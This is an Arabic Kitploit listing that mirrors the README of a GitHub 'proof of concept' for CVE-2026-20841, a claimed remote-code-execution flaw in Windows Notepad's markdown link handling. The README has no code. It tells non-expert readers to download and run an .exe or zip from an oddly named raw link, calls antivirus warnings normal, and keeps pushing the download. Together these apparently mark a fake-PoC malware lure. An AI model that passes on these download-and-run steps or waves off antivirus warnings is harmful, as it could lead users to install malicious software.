Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/hamzamalik3461/cve-2026-20841
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHubhamzamalik3461/cve-2026-20841

CVE-2026-20841

🛠 توضيح تنفيذ التعليمات البرمجية عن بُعد في مفكرة ويندوز عبر روابط ماركداون تستغل بروتوكولات عناوين URL غير الآمنة.

عرض المستودع
1218منذ 2 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️ CVE-2026-20841 - أداة اختبار الأمان لـ Windows Notepad

Download Releases

⚠️ ما هو CVE-2026-20841؟

CVE-2026-20841 هو ضعف أمني معروف في تطبيق Windows Notepad. ويؤثر على ميزة Markdown، التي تسمح للمفكرة بعرض نص منسّق مع روابط قابلة للنقر. يحدث هذا الضعف لأن محرك Markdown داخل المفكرة لا يقيّد أنواع الروابط (المسماة بروتوكولات URL) التي يسمح بها. وهذا يعني أن المهاجم يمكنه إنشاء رابط، عند النقر عليه، يجعل المفكرة تشغّل برامج أو أوامر لم يقصد المستخدم تشغيلها.

توفر هذه الأداة إثباتًا للمفهوم (PoC) لإظهار كيفية عمل هذا الخلل الأمني. وتساعد باحثي الأمن وخبراء التقنية على فهم كيفية عمل الثغرة واختبار ما إذا كانت الأنظمة معرضة للخطر.

💻 لمن هذه الأداة؟

صُمم هذا المشروع للأشخاص الذين يرغبون في:

  • فهم المخاطر المرتبطة بـ CVE-2026-20841 في Windows Notepad
  • اختبار ما إذا كانت أنظمتهم معرضة لهذه المشكلة الأمنية
  • تحسين إجراءاتهم الأمنية ضد هجمات تنفيذ التعليمات البرمجية عن بُعد

لا تتطلب هذه الأداة أي مهارات برمجية لتشغيلها. وهي الأنسب لمتخصصي تقنية المعلومات أو المستخدمين الفضوليين الذين يرغبون في فحص أجهزة Windows الخاصة بهم.

🚀 البدء

متطلبات النظام

قبل استخدام هذه الأداة، تأكد من أن جهازك يلبي هذه المتطلبات:

  • تشغيل Windows 10 أو الإصدارات الأحدث
  • تثبيت تطبيق المفكرة (وهو مضمّن افتراضيًا في Windows)
  • اتصال بالإنترنت لتنزيل الملفات
  • مساحة كافية على القرص للتنزيل (أقل من 10 ميجابايت)

الأذونات اللازمة

قد تحتاج أداة الاختبار إلى إذن لتشغيل برامج على جهاز الكمبيوتر الخاص بك. قد ترى تحذيرات من Windows Defender أو برنامج مكافحة الفيروسات. هذا أمر طبيعي لأن الأداة تحاكي كيفية عمل الهجمات الحقيقية.

يجب عليك تشغيل الأداة فقط على أجهزة الكمبيوتر التي تملكها أو لديك إذن باختبارها.

📥 التنزيل والتثبيت

للحصول على الأداة، اتبع الخطوات التالية:

  1. انتقل إلى صفحة الإصدارات.
    انقر هذا الزر الكبير لزيارة منطقة التنزيلات:
    Download Releases

  2. اختر أحدث إصدار في الصفحة.
    ابحث عن الملف المناسب لنظامك (عادةً ملف .exe أو .zip).

  3. نزّل الملف.
    انقر رابط اسم الملف لبدء التنزيل.

  4. شغّل الأداة أو فك ضغطها.

  • إذا كان ملفًا .exe، انقر نقرًا مزدوجًا عليه لتشغيله.
  • إذا كان ملفًا .zip، انقر بزر الماوس الأيمن واختر “Extract All,” ثم افتح المجلد وانقر نقرًا مزدوجًا على ملف .exe بداخله.
  1. اتبع التعليمات التي تظهر على الشاشة.
    سترشدك الأداة خلال عملية الاختبار.

🧭 كيفية استخدام الأداة

بعد التثبيت، ستظهر لك نافذة بسيطة تحتوي على تعليمات. إليك كيفية المتابعة:

  • الخطوة 1: ابدأ الاختبار بالنقر على زر “Run Test”.
  • الخطوة 2: ستحاكي الأداة ملف markdown يحتوي على روابط خاصة.
  • الخطوة 3: ستُظهر ما إذا كانت المفكرة لديك تسمح بالروابط غير الآمنة القابلة للنقر.
  • الخطوة 4: راجع تقرير الاختبار داخل التطبيق أو في ملف على سطح المكتب.

🔍 ماذا يفعل هذا الاختبار؟

تنشئ الأداة ملف markdown وهميًا يحتوي على روابط تستخدم معالجات URL غير معتادة. في العادة، يجب ألا تفتح هذه الروابط برامج دون إذن. ولكن بسبب CVE-2026-20841، لا يحظرها المفكرة.

عند تشغيل الاختبار، تحاول الأداة فتح هذه الروابط في المفكرة. إذا نجحت، فهذا يعني أن المفكرة معرضة للخطر ويمكن أن تسمح للمهاجمين بتشغيل تعليمات برمجية ضارة.

🛠 الميزات

  • إطلاق اختبار سهل بنقرة واحدة
  • تقرير واضح يُظهر ما إذا كان نظامك متأثرًا
  • واجهة مستخدم بسيطة مصممة لغير الخبراء
  • يدعم إصدارات Windows الحديثة
  • حجم تنزيل صغير

🔄 كيفية التحديث

للحفاظ على دقة الاختبار، نزّل الإصدارات الجديدة عند توفرها:

  1. زر نفس صفحة الإصدارات مرة أخرى:
    https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip
  2. ابحث عن أحدث إصدار في الأعلى.
  3. نزّل الملف الجديد وشغّله كما هو موصوف في قسم التنزيل.

👥 الحصول على المساعدة والدعم

إذا واجهت مشاكل، يمكنك:

  • مراجعة تبويب “Issues” في صفحة GitHub لمعرفة ما إذا كان الآخرون يعانون من المشكلة نفسها
  • استخدام صفحة “Discussions” للأسئلة والأجوبة
  • العثور على معلومات الاتصال بالمطورين في الصفحة الرئيسية للمستودع

🔒 حافظ على سلامتك

توضح هذه الأداة كيف يمكن للمخترقين استغلال الثغرات الأمنية. استخدمها بمسؤولية:

  • لا تستخدمها على أجهزة لا تملكها أو ليس لديك إذن باختبارها.
  • احرص دائمًا على تحديث برامجك، بما في ذلك Windows.
  • تجنب النقر على الروابط المشبوهة في الملفات أو رسائل البريد الإلكتروني غير المعروفة.

🗂 مواضيع ذات صلة

يتعلق هذا المشروع بـ:

  • البحث الأمني في Windows Notepad
  • ثغرات حقن الأوامر
  • مخاطر تنفيذ التعليمات البرمجية عن بُعد (RCE)
  • التوعية بالأمن السيبراني
  • أدوات اختبار الثغرات

يمكنك البدء بالاختبار الآن بزيارة صفحة التنزيلات:
تنزيل أداة CVE-2026-20841

تنزيل الأداة